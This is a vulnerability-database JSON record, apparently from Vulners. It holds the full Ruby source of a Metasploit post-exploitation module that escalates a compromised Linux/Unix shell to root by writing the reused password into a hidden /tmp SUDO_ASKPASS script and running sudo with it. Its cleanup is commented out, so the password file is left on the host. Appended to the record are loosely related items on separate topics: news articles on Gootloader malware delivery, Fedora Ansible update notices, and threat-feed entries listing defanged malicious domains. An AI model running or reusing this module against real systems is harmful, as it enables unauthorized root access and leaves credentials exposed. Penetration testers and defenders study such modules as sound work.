{"id": "MSF:POST/MULTI/MANAGE/SUDO", "type": "metasploit", "bulletinFamily": "exploit", "title": "Multiple Linux / Unix Post Sudo Upgrade Shell", "description": "This module attempts to upgrade a shell account to UID 0 by reusing the given password and passing it to sudo. This technique relies on sudo versions from 2008 and later which support -A.\n", "published": "2011-11-18T16:16:57", "modified": "2020-07-23T13:04:20", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.sudo.ws/repos/sudo/file/05780f5f71fd/sudo.h"], "cvelist": [], "lastseen": "2020-07-25T00:06:00", "viewCount": 151, "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2020-07-25T00:06:00", "rev": 2}, "dependencies": {"references": [{"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4BE360A9A825DEBBCADB05F3EE6777F0", "TRENDMICROBLOG:380ED8C8259FF30CA69F0998B6225978", "TRENDMICROBLOG:C8C4950B7C1ABCC3623954974416E5A2"]}, {"type": "hackread", "idList": ["HACKREAD:79B4C6B773EFFE1B97264FE830243A65"]}, {"type": "kitploit", "idList": ["KITPLOIT:1171667579156198567", "KITPLOIT:3516084899857192644", "KITPLOIT:5416094341903135271"]}, {"type": "mssecure", "idList": ["MSSECURE:13C42846F104475D763DA4BFC93C0B2D", "MSSECURE:D004CE78869D49C5649EBAD1CF6E6591", "MSSECURE:8758A81935434F705333701EA00BF404"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1037-1"]}, {"type": "thn", "idList": ["THN:4BA22F23EA755CF350D79FDE871D4377", "THN:3BB9B59BEF87F98A7DFFEA8DC0CCB025"]}, {"type": "nessus", "idList": ["SUSE_SU-2020-2008-1.NASL", "SUSE_SU-2020-1970-1.NASL", "OPENSUSE-2020-804.NASL"]}, {"type": "securelist", "idList": ["SECURELIST:9C375DB331E2434EE824100A45629096"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-5766"]}, {"type": "threatpost", "idList": ["THREATPOST:2A10807088DDCBC0F545D9C6870DD195"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:F8C45CBFA2F30D350118B999AB93C2BA"]}], "modified": "2020-07-25T00:06:00", "rev": 2}, "vulnersScore": 0.1}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/multi/manage/sudo.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Multiple Linux / Unix Post Sudo Upgrade Shell',\n 'Description' => %q{\n This module attempts to upgrade a shell account to UID 0 by reusing the\n given password and passing it to sudo. This technique relies on sudo\n versions from 2008 and later which support -A.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'todb <todb[at]metasploit.com>',\n 'Ryan Baxendale <rbaxendale[at]gmail.com>' #added password option\n ],\n 'Platform' => %w{ aix linux osx solaris unix },\n 'References' =>\n [\n # Askpass first added March 2, 2008, looks like\n [ 'URL', 'http://www.sudo.ws/repos/sudo/file/05780f5f71fd/sudo.h']\n ],\n 'SessionTypes' => [ 'shell' ] # Need to test 'meterpreter'\n ))\n\n register_options(\n [\n OptString.new('PASSWORD', [false, 'The password to use when running sudo.'])\n ])\n end\n\n # Run Method for when run command is issued\n def run\n print_status(\"SUDO: Attempting to upgrade to UID 0 via sudo\")\n sudo_bin = cmd_exec(\"which sudo\")\n if is_root?\n print_status \"Already root, so no need to upgrade permissions. Aborting.\"\n return\n end\n if sudo_bin.empty?\n print_error \"No sudo binary available. Aborting.\"\n return\n end\n get_root()\n end\n\n def get_root\n if datastore['PASSWORD']\n password = datastore['PASSWORD']\n else\n password = session.exploit_datastore['PASSWORD']\n end\n\n if password.to_s.empty?\n print_status \"No password available, trying a passwordless sudo.\"\n else\n print_status \"Sudoing with password `#{password}'.\"\n end\n askpass_sudo(password)\n unless is_root?\n print_error \"SUDO: Didn't work out, still a mere user.\"\n else\n print_good \"SUDO: Root shell secured.\"\n report_note(\n :host => session,\n :type => \"host.escalation\",\n :data => \"User `#{session.exploit_datastore['USERNAME']}' sudo'ed to a root shell\"\n )\n end\n end\n\n # TODO: test on more platforms\n def askpass_sudo(password)\n if password.to_s.empty?\n begin\n ::Timeout.timeout(30) do\n cmd_exec(\"sudo -s\")\n end\n rescue ::Timeout::Error\n print_error \"SUDO: Passwordless sudo timed out. Might be blocking.\"\n rescue\n print_error \"SUDO: Passwordless sudo failed. Check the session log.\"\n end\n else\n askpass_sh = \"/tmp/.\" + Rex::Text.rand_text_alpha(7)\n begin\n # Telnet can be pretty pokey, allow about 20 seconds per cmd_exec\n # Generally will be much snappier over ssh.\n # Need to timeout in case there's a blocking prompt after all\n ::Timeout.timeout(120) do\n vprint_status \"Writing the SUDO_ASKPASS script: #{askpass_sh}\"\n write_file(askpass_sh, \"#!/bin/sh\\necho '#{password}'\\n\")\n vprint_status \"Setting executable bit.\"\n cmd_exec(\"chmod +x #{askpass_sh}\")\n vprint_status \"Setting environment variable.\"\n # Bruteforce the set command. At least one should work.\n cmd_exec(\"setenv SUDO_ASKPASS #{askpass_sh}\")\n cmd_exec(\"export SUDO_ASKPASS=#{askpass_sh}\")\n vprint_status \"Executing sudo -s -A\"\n cmd_exec(\"sudo -s -A\")\n end\n rescue ::Timeout::Error\n print_error \"SUDO: Sudo with a password timed out.\"\n rescue\n print_error \"SUDO: Sudo with a password failed. Check the session log.\"\n end\n # askpass_cleanup(askpass_sh)\n end\n end\n\n def askpass_cleanup(askpass_sh)\n begin\n ::Timeout.timeout(20) do\n vprint_status \"Deleting the SUDO_ASKPASS script.\"\n cmd_exec(\"rm #{askpass_sh}\")\n end\n rescue ::Timeout::Error\n print_error \"Timed out during sudo cleanup.\"\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}

{"threatpost": [{"lastseen": "2021-03-01T21:39:09", "bulletinFamily": "info", "cvelist": [], "description": "The Gootloader malware loader, previously used for distributing the Gootkit malware family, has undergone what researchers call a \u201crenaissance\u201d when it comes to payload delivery.\n\nNew research released this week paints Gootloader as an increasingly sophisticated loader framework, which has now expanded the number of payloads its delivers beyond Gootkit (and in some cases, the previously-distributed [REvil ransomware](<https://threatpost.com/gandcrab-operators-resurface-revile-malware/148631/>)), to include the [Kronos trojan](<https://threatpost.com/kronos-banking-trojan-resurfaces-after-years-of-silence/134364/>) and the [Cobalt Strike](<https://threatpost.com/solarwinds-malware-arsenal-raindrop/163153/>) commodity malware.\n\nGootloader is known for its multi-stage attack process, obfuscation tactics, and for using a known tactic for malware delivery called search engine optimization (SEO) poisoning. This technique leverages SEO-friendly terms in attacker-controlled websites, in order to rank them higher in Google\u2019s search index. In the end, the method brings more eyeballs to the malicious sites, which contain links that launch the Gootloader attack chain.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe malware delivery method pioneered by the threat actors behind the REvil ransomware and the Gootkit banking Trojan has been enjoying a renaissance of late, as telemetry indicates that criminals are using the method to deploy an array of malware payloads in South Korea, Germany, France, and across North America,\u201d said Gabor Szappanos and Andrew Brandt, security researchers with Sophos Labs [on Monday](<https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/?cmp=30728>).\n\n## **What is the Gootloader Malware Tool?**\n\nGootloader is a Javascript-based infection framework that was traditionally used for the Gootkit remote access trojan (RAT). The [Gootkit malware family](<https://threatpost.com/sload-malware-revamped-starslord-l-features/152084/>), which has been around for more than five years, has evolved over time into a mature trojans primarily aimed at stealing banking credentials.\n\nWhile Gootloader was previously used as a vehicle to merely deliver the Gootkit malware, \u201cIn recent years, almost as much effort has gone into improvement of its delivery method as has gone into the NodeJS-based malware itself,\u201d said researchers.\n\nIn addition to its use of SEO poisoning, what sets Gootloader apart is its fileless malware delivery tactics, they said. Fileless malware uses trusted, legitimate processes (in the case of Gootloader, PowerShell, for instance) that allows the malware delivery mechanism to evade antivirus products.\n\n## **Gootloader Malware: Compromised, Legitimate Websites**\n\nIn order to perform SEO poisoning, Gootloader attackers have first compromised a wide variety of legitimate websites, which they maintain on a network of roughly 400 servers, said researchers.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/03/01155723/gootloader-search-results-are-valid.png>)\n\nAn example of an Gootloader attack. Credit: Sophos Labs\n\nResearchers said, the operators of these legitimate, hacked websites do not seem to know their websites are being abused in this manner.\n\n\u201cIt isn\u2019t clear how the threat actors gain access to the backend of these sites, but historically, these kinds of website compromises may be the result of any of a number of methods: The attackers may simply obtain the sites\u2019 passwords from the Gootkit malware itself, or from any of a number of criminal markets that trade in stolen credentials, or by leveraging any of a number of security exploits in the plugins or add-ons of the CMS software,\u201d they said.\n\n## **Using Google Search Engine Optimization For Malware Delivery**\n\nGootloader attacker-compromised websites then tweak the content management systems of the websites to use key SEO tactics and terms. The goal here is to appear at the top of Google\u2019s index when certain questions are typed into Google search.\n\nFor instance, typing the question \u201cdo I need a party wall agreement to sell my house?\u201d turns up a legitimate website for a Canada-based neonatal medical practice, which has actually been compromised by Gootloader attackers.\n\nThe part of the website that has been compromised by attackers features a \u201cmessage board\u201d with a \u201cuser\u201d asking the question \u201cdo I need a party wall agreement to sell my house?\u201d This uses the exact same wording as the search query, as a way to rank higher on Google\u2019s search index \u2013 even if it has nothing to do with the actual content of the compromised website.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/03/01155805/gootloader-party-wall.png>)\n\nAn example of an Gootloader attack. Credit: Sophos Labs\n\nOn that \u201cmessage board,\u201d an \u201cadmin profile\u201d then responds to the question with a link purporting to have more information.\n\n\u201cNone of the site\u2019s legitimate content has anything to do with real estate transactions \u2013 its doctors deliver babies \u2013 and yet it is the first result to appear in a query about a very narrowly defined type of real estate agreement,\u201d said researchers. \u201cGoogle itself indicates the result is not an ad, and they have known about the site for nearly seven years. To the end user, the entire thing looks on the up-and-up.\u201d\n\nThreatpost has reached out to Google for more information on how the company is battling such SEO poisoning types of attacks.\n\n## **Gootloader Payload Delivery Mechanism**\n\nGootloader\u2019s payload delivery mechanism is complex and involves multiple stages.\n\nInitially, when the website user clicks on the \u201cadmin\u201d account\u2019s link on the compromised website, they receive a ZIP archive file with a filename (again matching the search query terms used in the initial search). This file then contains another JS file (with the same name). JS extension files involve a text file containing JavaScript code, used to execute JavaScript instructions in webpages; the specific JS files in this attack typically invoke the Windows Scripting Host (wscript.exe) when run.\n\n\u201cThis .js file is the initial infector, and the only stage of the infection at which a file is written to the filesystem,\u201d said researchers. \u201cEverything that happens after the target double-clicks this script runs entirely in memory, out of the reach of traditional endpoint protection tools.\u201d\n\nThe first-stage script, which is obfuscated, attempts to contact the command-and-control (C2) server \u2013 if it successfully does so, the second-stage malware process then creates an auto-run entry for a PowerShell script that doesn\u2019t execute until the system reboots, creating a stealthy way for attackers to sidestep detection.\n\n\u201cBecause this next stage doesn\u2019t completely execute until the next time the computer reboots, the target may not actually discover the infection until some hours or even days later \u2013 whenever they fully reboot Windows,\u201d said researchers.\n\nOnce the computer reboots, the PowerShell script runs and begins a dominoes-like sequence of events, ending with Gootloader attempting to download its final payload.\n\n\u201cThe Delphi loader contains the final payload \u2013 [Kronos](<https://threatpost.com/wannacry-hero-avoids-jail-time-in-kronos-malware-charges/146721/>), [REvil](<https://threatpost.com/revil-video-game-hit-revenue/160743/>), Gootkit, or [Cobalt Strike](<https://threatpost.com/solarwinds-malware-arsenal-raindrop/163153/>) \u2013 in encrypted form,\u201d said researchers. \u201cIn those cases, the loader decrypts the payload, then uses its own PE loader to execute the payload in memory.\u201d\n\n## **Other Malware Google SEO Abuse Tactics **\n\nThe abuse of SEO to gain more eyeballs and traction to malicious sites is an age-old trick for cybercriminals, with examples of this type of tactic [dating back to at least 2011](<https://threatpost.com/seo-poisoned-sites-still-slipping-google-012111/74869/>). In 2017, cybercriminals [poisoned Google search results](<https://threatpost.com/poisoned-search-results-deliver-banking-malware/128759/>) in the hope of infecting users with a banking Trojan called Zeus Panda, for instance.\n\nThese types of attacks continue because they work, said researchers.\n\n\u201cScript blockers like NoScript for Firefox could help a cautious web surfer remain safe by preventing the initial replacement of the hacked web page to happen, but not everyone uses those tools (or finds them convenient or even intuitive),\u201d they said. \u201cEven attentive users who are aware of the trick involving the fake forum page might not recognize it until it\u2019s too late.\u201d\n", "modified": "2021-03-01T21:23:42", "published": "2021-03-01T21:23:42", "id": "THREATPOST:84C4FA73431683A5F74B7C0D744C523A", "href": "https://threatpost.com/malware-loader-google-seo-payload/164377/", "type": "threatpost", "title": "Malware Loader Abuses Google SEO to Expand Payload Delivery", "cvss": {"score": 0.0, "vector": "NONE"}}], "fedora": [{"lastseen": "2021-03-01T21:17:09", "bulletinFamily": "unix", "cvelist": ["CVE-2021-20178", "CVE-2021-20180", "CVE-2021-20191", "CVE-2021-20228"], "description": "Ansible is a radically simple model-driven configuration management, multi-node deployment, and remote task execution system. Ansible works over SSH and does not require any software or daemons to be installed on remote nodes. Extension modules can be written in any language and are transferred to managed machines automatically. ", "modified": "2021-03-01T17:06:17", "published": "2021-03-01T17:06:17", "id": "FEDORA:3FEA730A9F55", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: ansible-2.9.18-1.fc32", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-03-01T21:17:09", "bulletinFamily": "unix", "cvelist": ["CVE-2021-20178", "CVE-2021-20180", "CVE-2021-20191", "CVE-2021-20228"], "description": "Ansible is a radically simple model-driven configuration management, multi-node deployment, and remote task execution system. Ansible works over SSH and does not require any software or daemons to be installed on remote nodes. Extension modules can be written in any language and are transferred to managed machines automatically. ", "modified": "2021-03-01T17:02:27", "published": "2021-03-01T17:02:27", "id": "FEDORA:BF8633094DF0", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: ansible-2.9.18-1.fc33", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2021-03-01T14:27:53", "bulletinFamily": "info", "cvelist": [], "description": "[](<https://thehackernews.com/images/-R_Zsuk8vToA/YDz3Xko0qOI/AAAAAAAAB6Q/cNIHjigZOWIgTxlpUFAtkYnHJj8thwXlACLcBGAsYHQ/s0/hacking.jpg>)\n\nA framework notorious for delivering a banking Trojan has received a facelift to deploy a wider range of malware, including ransomware payloads.\n\n\"The [Gootkit](<https://malpedia.caad.fkie.fraunhofer.de/details/win.gootkit>) malware family has been around more than half a decade \u2013 a mature Trojan with functionality centered around banking credential theft,\" Sophos researchers Gabor Szappanos and Andrew Brandt [said](<https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options>) in a write-up published today.\n\n\"In recent years, almost as much effort has gone into improvement of its delivery method as has gone into the NodeJS-based malware itself.\"\n\nDubbed \"Gootloader,\" the expanded malware delivery system comes amid a surge in the number of infections targeting users in France, Germany, South Korea, and the U.S.\n\nFirst documented in 2014, Gootkit is a Javascript-based malware platform capable of carrying out an array of covert activities, including web injection, capturing keystrokes, taking screenshots, recording videos, as well as email and password theft.\n\nOver the years, the cybercrime tool has evolved to gain new information-stealing features, with the Gootkit loader [repurposed](<https://blog.malwarebytes.com/threat-analysis/2020/11/german-users-targeted-with-gootkit-banker-or-revil-ransomware/>) in combination with REvil/Sodinokibi ransomware infections reported last year.\n\nWhile campaigns using social engineering tricks to deliver malicious payloads are a dime a dozen, Gootloader takes it to the next level.\n\nThe infection chain resorts to sophisticated techniques that involve hosting malicious ZIP archive files on websites belonging to legitimate businesses that have been gamed to appear among the top results of a search query using manipulated search engine optimization (SEO) methods.\n\n[](<https://thehackernews.com/images/-jKrl6_59sww/YDz3lj7iPzI/AAAAAAAAB6U/gkVDyYnfxSoxHtjCmVAhySHz6_vysIHvACLcBGAsYHQ/s0/malware.jpg>)\n\nWhat's more, the search engine results point to websites that have no \"logical\" connection to the search query, implying that the attackers must be in possession of a vast network of hacked websites. In one case spotted by the researchers, an advice for a real estate agreement surfaced a breached neonatal medical practice based in Canada as the first result.\n\n\"To ensure targets from the right geographies are captured, the adversaries rewrite website code 'on the go' so that website visitors who fall outside the desired countries are shown benign web content, while those from the right location are shown a page featuring a fake discussion forum on the topic they've queried,\" the researchers said.\n\nClicking the search result takes the user to a fake message board-like page that matches not only the search terms used in the initial query but also includes a link to the ZIP file, which contains a heavily obfuscated Javascript file that initiates the next stage of compromise to inject the fileless malware fetched from a remote server into memory.\n\nThis takes the form of a multi-stage evasive approach that begins with a .NET loader, which comprises a Delphi-based loader malware, which, in turn, contains the final payload in encrypted form.\n\nIn addition to delivering the REvil ransomware and the Gootkit trojan, multiple campaigns have been spotted currently leveraging the Gootloader framework to deliver the Kronos financial malware in Germany stealthily, and the Cobalt Strike post-exploitation tool in the U.S.\n\nIt's still unclear as to how the operators gain access to the websites to serve the malicious injects, but the researchers suspect the attackers may have obtained the passwords by installing the Gootkit malware or purchasing stolen credentials from underground markets, or by leveraging security flaws in present in the plugins used alongside content management system (CMS) software.\n\n\"The developers behind Gootkit appear to have shifted resources and energy from delivering just their own financial malware to creating a stealthy, complex delivery platform for all kinds of payloads, including REvil ransomware,\" said Gabor Szappanos, threat research director at Sophos.\n\n\"This shows that criminals tend to reuse their proven solutions instead of developing new delivery mechanisms. Further, instead of actively attacking endpoint tools as some malware distributors do, the creators of Gootloader have opted for convoluted evasive techniques that conceal the end result,\" he added.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2021-03-01T14:18:35", "published": "2021-03-01T14:18:00", "id": "THN:2392425566C87B11BD57FA63C731A488", "href": "https://thehackernews.com/2021/03/gootkit-rat-using-seo-to-distribute.html", "type": "thn", "title": "Gootkit RAT Using SEO to Distribute Malware Through Compromised Sites", "cvss": {"score": 0.0, "vector": "NONE"}}], "rst": [{"lastseen": "2021-02-28T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **accservice-manage[.]myvnc.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **34**.\n First seen: 2021-02-01T03:00:00, Last seen: 2021-02-28T03:00:00.\n IOC tags: **malware**.\nDomain has DNS A records: 188[.]166.145.25\nWhois:\n Created: 2001-06-01 21:14:31, \n Registrar: TLDS LLC dba SRSPlus, \n Registrant: NoIPcom.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-01T00:00:00", "id": "RST:9585041A-2191-3D61-9A61-FF198F993A0D", "href": "", "published": "2021-03-01T00:00:00", "title": "RST Threat feed. IOC: accservice-manage.myvnc.com", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-28T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **manage-account[.]verifyapps.ijw9e8fjwo.co** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2021-02-18T03:00:00, Last seen: 2021-02-28T03:00:00.\n IOC tags: **malware**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-18T00:00:00", "id": "RST:BBD167A0-98E8-3787-9BCD-1A5452F1E3D8", "href": "", "published": "2021-03-01T00:00:00", "title": "RST Threat feed. IOC: manage-account.verifyapps.ijw9e8fjwo.co", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-28T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **manage-security[.]duckdns.org** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2021-02-20T03:00:00, Last seen: 2021-02-28T03:00:00.\n IOC tags: **malware**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-20T00:00:00", "id": "RST:8504426E-28FE-308E-881A-8C5731C34579", "href": "", "published": "2021-03-01T00:00:00", "title": "RST Threat feed. IOC: manage-security.duckdns.org", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-28T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **manage[.]account-verifyapps.84tvy367y3.co** in [RST Threat Feed](https://rstcloud.net/profeed) with score **45**.\n First seen: 2021-02-18T03:00:00, Last seen: 2021-02-28T03:00:00.\n IOC tags: **malware**.\nDomain has DNS A records: 34[.]98.99.30\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-18T00:00:00", "id": "RST:72AA6441-F1DC-3A01-A981-F9113759AD7B", "href": "", "published": "2021-03-01T00:00:00", "title": "RST Threat feed. IOC: manage.account-verifyapps.84tvy367y3.co", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-28T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **manage[.]account-verifyapps.c263hr242r.co** in [RST Threat Feed](https://rstcloud.net/profeed) with score **45**.\n First seen: 2021-02-18T03:00:00, Last seen: 2021-02-28T03:00:00.\n IOC tags: **malware**.\nDomain has DNS A records: 34[.]98.99.30\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-18T00:00:00", "id": "RST:9E651D8C-3D7D-31C6-AE35-9FDEF4F157BD", "href": "", "published": "2021-03-01T00:00:00", "title": "RST Threat feed. IOC: manage.account-verifyapps.c263hr242r.co", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-28T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **manage[.]account-verifyapps.ctu346t3t34.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **45**.\n First seen: 2021-02-18T03:00:00, Last seen: 2021-02-28T03:00:00.\n IOC tags: **malware**.\nDomain has DNS A records: 34[.]98.99.30\nWhois:\n Created: 2020-07-10 22:48:27, \n Registrar: GoDaddycom LLC, \n Registrant: unknown.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-18T00:00:00", "id": "RST:0C2F3899-56C1-3BB5-81FA-E521401C7D2D", "href": "", "published": "2021-03-01T00:00:00", "title": "RST Threat feed. IOC: manage.account-verifyapps.ctu346t3t34.com", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-28T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **manage[.]account-verifyapps.dwa32r243xfxonline.xyz** in [RST Threat Feed](https://rstcloud.net/profeed) with score **45**.\n First seen: 2021-02-18T03:00:00, Last seen: 2021-02-28T03:00:00.\n IOC tags: **malware**.\nDomain has DNS A records: 34[.]98.99.30\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-18T00:00:00", "id": "RST:A6AB63FB-AD7E-3CBF-A548-38BDD4528E46", "href": "", "published": "2021-03-01T00:00:00", "title": "RST Threat feed. IOC: manage.account-verifyapps.dwa32r243xfxonline.xyz", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-28T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **manage[.]account-verifyappsinf.c263hr242r.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **45**.\n First seen: 2021-02-18T03:00:00, Last seen: 2021-02-28T03:00:00.\n IOC tags: **malware**.\nDomain has DNS A records: 34[.]98.99.30\nWhois:\n Created: 2020-07-10 22:42:14, \n Registrar: GoDaddycom LLC, \n Registrant: unknown.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-18T00:00:00", "id": "RST:0C16E26B-DB4D-3E7B-8CEF-B43A68CDF05C", "href": "", "published": "2021-03-01T00:00:00", "title": "RST Threat feed. IOC: manage.account-verifyappsinf.c263hr242r.com", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-28T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **manage[.]account.support.locked.signin-activity.nyaheem.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **4**.\n First seen: 2020-04-27T03:00:00, Last seen: 2021-02-28T03:00:00.\n IOC tags: **malware**.\nDomain has DNS A records: 192[.]5.5.241\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-04-27T00:00:00", "id": "RST:2B06FCBF-646C-369E-B6E0-EB22D2020852", "href": "", "published": "2021-03-01T00:00:00", "title": "RST Threat feed. IOC: manage.account.support.locked.signin-activity.nyaheem.com", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-28T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **manage[.]account.support.locked.signin.eusidmk.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2020-04-27T03:00:00, Last seen: 2021-02-28T03:00:00.\n IOC tags: **malware**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-04-27T00:00:00", "id": "RST:D3F8E877-E28A-39D4-97D2-D0CAE93F61F8", "href": "", "published": "2021-03-01T00:00:00", "title": "RST Threat feed. IOC: manage.account.support.locked.signin.eusidmk.com", "type": "rst", "cvss": {}}]}